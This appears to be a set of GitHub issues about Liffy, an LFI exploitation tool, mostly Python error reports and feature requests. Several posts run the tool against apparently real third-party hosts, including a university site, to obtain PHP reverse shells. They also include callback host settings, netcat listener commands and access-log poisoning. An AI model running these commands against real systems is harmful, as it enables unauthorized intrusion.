I'm execute this command

python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i

Liffy v2.0

[] Checking Target: 206.209.126.5
[] Testing with data://
[?] Host For Callbacks: 192.168.1.54
[?] Port For Callbacks: 4444
[] Generating PHP listener
[+] Success!
[] listener: /tmp/shell.php
[] Start your listener by running nc -ntlp 4444
[] Starting Web Server ...
Traceback (most recent call last):
File "/home/king/liffy/core/server.py", line 11, in
import socketserver
ImportError: No module named socketserver
[?] Press Enter To Continue When Your netcat listener is Running ...

I got The Error No module named socketserver

Please resolve my problem as soon as possiable

I have a question..how to use this

[?] Host For Callbacks:
[?] Port For Callbacks:

using python its showing like this but with python3 its interface working but output not giving

> Traceback (most recent call last):
>   File "liffy.py", line 7, in <module>
>     import urllib.parse
> ImportError: No module named parse

http://www.codercaste.com/2009/10/03/the-null-byte-poisoning-attack-explained/
https://web.archive.org/web/20170617080614/hakipedia.com/index.php/Poison_Null_Byte
Showcased on OWASP Juice shop: https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/appendix/solutions.html#access-a-developers-forgotten-backup-file

Right now we use msfvenom to generate payload and then use msfconsole to listen for the reverse shell. It would be nice if we can generate our own payload and then either listen with something like nc -nlvp PORT or run our own listener.

The module python-daemons defined under requirements.txt doesn't seem to be used and trying to install it with pip throws an error.

It would be nice if we can perform LFI testing without having to give a shell back. Just to shell if any parameter is vulnerable or not

There should be an option to test for directory traversal while taking payload from a file.

(liffy) [user@host ~/liffy ]$ python liffy.py "http://xxxxx:49768/?file="  -a -l /var/apache2/access.log 
 _      _  __  __              ___    ___  
| |    (_)/ _|/ _|            |__ \  / _ \ 
| |     _| |_| |_ _   _  __   __ ) || | | |
| |    | |  _|  _| | | | \ \ / // / | | | |
| |____| | | | | | |_| |  \ V // /_ | |_| |
|______|_|_| |_|  \__, |   \_/|____(_)___/ 
                   __/ |                   
                  |___/                    



[~] Checking Target: xxxxxxx:49768
[~] Testing for Apache access.log poisoning
Traceback (most recent call last):
  File "/home/user/liffy/liffy.py", line 131, in <module>
    main()
  File "/home/user/liffy/liffy.py", line 102, in main
    a = accesslog(url, l, nostager, relative, cookies)
TypeError: 'module' object is not callable

$ python --version
Python 3.9.2

I think authlog.py is supposed to be accesslog, as it poisins the useragent column in http access logs.

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

• https://inventory.rawsec.ml/tools.html#Liffy

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool and improve its referencing.

Badges

The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.

In a server that is self-signed certificate the program raises a SSLError exception.
[SSL: CERTIFICATE_VERIFY_FAILED].
Maybe put an exception for this situation or ignore to verify the cert.

Hey !
I'm a newbie and not able to run the tool. I got an error. Here is what I'm trying
python version:3.7
liffy version: 2.0

command:
python3 liffy.py http://namal.edu.pk/?id= -d

[~] Checking Target: namal.edu.pk
[~] Testing with data:// 
[?] Host For Callbacks: 172.16.13.243
[?] Port For Callbacks: 5050
[~] Generating PHP listener
[+] Success! 
[~] listener: /tmp/shell.php
[~] Start your listener by running nc -ntlp 5050
[~] Starting Web Server ... 

I'm totally not able to understand which IP and port should I enter in Host For Callbacks and Ports for Callbacks respectively.
I didn't find any reading about this on your repo.

Then I also unable to understand what's the purpose of running nc -ntlp port-no

Here is the Error I got:

Traceback (most recent call last):
  File "/home/salman/Desktop/FYP2022Secuirty/FYP-Directory/FYP2022Security/Live_Assets/liffy/core/Server.py", line 11, in <module>
    httpd = socketserver.TCPServer(("0.0.0.0", 8080), handler)
  File "/usr/lib/python3.9/socketserver.py", line 452, in __init__
    self.server_bind()
  File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
[?] Press Enter To Continue When Your netcat listener is Running ...
[!] Unexpected HTTP Response